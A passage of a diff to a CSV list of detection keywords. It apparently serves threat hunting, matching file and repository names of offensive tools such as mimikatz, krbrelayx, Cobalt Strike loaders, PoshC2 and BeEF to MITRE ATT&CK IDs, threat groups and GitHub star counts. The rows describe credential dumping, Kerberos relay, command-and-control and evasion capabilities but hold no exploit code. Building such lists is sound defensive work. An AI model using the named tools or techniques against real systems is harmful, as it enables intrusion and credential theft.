itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/dirkjanm/krbrelayx","1","0","N/A","10","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.git*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*krbrelayx.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" -"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx.py*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*krbrelayx-master*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "*krbroast-pcap2hashcat.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*KRBUACBypass 1*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" "*KRBUACBypass.csproj*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" @@ -12864,18 +13020,18 @@ "*kubesploit-main*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Darwin*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*kubesploitServer-Linux*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" -"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kuhl_m_sekurlsa_nt6.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_nt6.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_packages.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.c*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kuhl_m_sekurlsa_utils.h*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kwallet2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*kwetza*","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/sensepost/kwetza","1","0","N/A","N/A","7","604","256","2023-07-21T16:30:40Z","2016-09-22T14:39:10Z" -"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","712","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*kyleavery/AceLdr*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" "*kyleavery/inject-assembly*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*L0phtCrack*","offensive_tool_keyword","L0phtCrack","L0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations. networked servers. primary domain controllers. or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary. brute force. etc). LC5 was discontinued by Symantec in 2006. then re-acquired by the original L0pht guys and reborn as LC6 in 2009. For free alternatives. consider ophcrack. Cain and Abel. or John the Ripper. For downloads and more information. visit the L0phtCrack homepage.","T1003 - T1110 - T1212 - T1552 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://www.l0phtcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*label-implant *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Ladon * AllScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Ladon * CiscoScan*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Ladon * OnlineIP*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" @@ -12971,26 +13127,27 @@ "*Ladon-N40.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*LadonStudy.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "*Lalin.sh *","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" -"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*lan_fingerprint_common.*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*lan_ping_sweep.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*lan_sw_port_scan.json*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - 